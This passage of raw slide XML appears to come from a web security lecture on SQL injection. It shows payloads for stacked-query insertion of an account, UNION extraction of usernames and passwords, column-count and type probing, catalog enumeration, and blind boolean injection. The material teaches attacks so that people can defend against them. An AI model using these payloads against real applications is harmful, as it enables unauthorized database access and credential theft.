          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is the SQL query separator?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the SQL server allows it, you can use ; to inject multiple, arbitrary, queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sa_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> username=''</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>insert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sa_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> ('user', 'password') </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>values</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> ('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>adam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>', 'test'); --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>' and password= ''</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="61480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Requests – Methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>The method that that client wants applied to the resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Common methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>GET – Request transfer of the entity referred to by the URI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>POST – Ask the server to process the included body as “data” associated with the resource identified by the URI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>PUT – Request that the enclosed entity be stored under the supplied URI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>HEAD – Identical to GET except server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" noProof="0"/>
              <a:t>must not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>return a body</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" noProof="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9616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r>
              <a:rPr lang="en-US"/>
              <a:t>Identifying SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="565251" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A SQL injection vulnerability can be identified in different ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Negative approach: special-meaning characters in the query will cause an error (for example: user=“ ’ ”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Positive approach: provide an expression that would NOT cause an error (for example: “17+5” instead of “22”, or a string concatenation, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>such as “‘ ’Foo” instead of “Foo” </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1562297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a:t>The UNION Operator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="567299" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The UNION operator is used to merge the results of two separate queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>SELECT REPEAT('a',1) UNION SELECT REPEAT('b', 10);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'a'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'b'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In a SQL injection attack this can be exploited to extract additional information from the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Original query:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT id, name, price FROM products WHERE brand='${b}'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modified query passing ${b}="foo' UNION…":</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT id, name, price FROM products WHERE brand='foo' UNION SELECT user, pass, NULL FROM accounts -- '</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In order for this attack to work the attacker has to know</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The structure of the query (number of parameters and types have to be compatible: NULL can be used if the type is not known)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The name of the table and columns   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="169430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7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7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7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7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72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72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2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72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729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72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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Determining Number and Type of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Query Parameters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="569347" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The number of columns in a query can be determined using progressively longer NULL columns until the correct query is returned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNION SELECT NULL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNION SELECT NULL, NULL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNION SELECT NULL, NULL, NULL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The type of columns can be be determined using a similar technique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, to determine the column that has a string type one would execute: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNION SELECT ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’, NULL, NULL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNION SELECT NULL, ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’, NULL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNION SELECT NULL, NULL, ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="902345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9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93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93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p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Determining Table and Column Names</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="571395" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To determine table and column names one has to rely on techniques that are database-specific</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Oracle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>user_objects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> table one can extract information about the tables created for an application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>user_tab_column</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> table one can extract the names of the columns associated with a table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MS-SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> table one can extract information about the tables in the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>syscolumns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> table one can extract the names of the columns associated with a table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tables one can extract information about the table names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> table one can extract the names of the columns associated with a table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2083284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1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13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13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13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13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40" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Blind SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140741" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A typical countermeasure is to prohibit the display of error messages. But, is this enough?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>No, a web application may still be vulnerable to blind SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Example: a news site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Press releases are accessed with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>pressRelease.jsp?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>=5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A SQL query is created and sent to the database:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>select title, description FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>pressReleases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> where id=5;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>All error messages are filtered by the application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="224613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0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0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07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07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07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07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07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8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Blind SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1142789" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>How can we inject statements into the application and exploit it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>We do not receive feedback from the application so we can use a trial-and-error approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>First, we try to inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>pressRelease.jsp?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>=5 AND 1=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The SQL query is created and sent to the database:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>select title, description FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>pressReleases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> where id=5 AND 1=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If there is a SQL injection vulnerability, the same press release should be returned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If input is validated, id=5 AND 1=1 should be treated as the value</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1515811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2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2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2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27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27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27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27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6" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Blind SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1144837" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>When testing for vulnerability, we know 1=1 is always true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>However, when we inject other statements, we do not have any information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>What we know: If the same record is returned, the statement must have been true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>For example, we can ask server if the current user is “h4x0r”:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>pressRelease.jsp?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>=5 AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>user_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>()=‘h4x0r’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>By combining </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
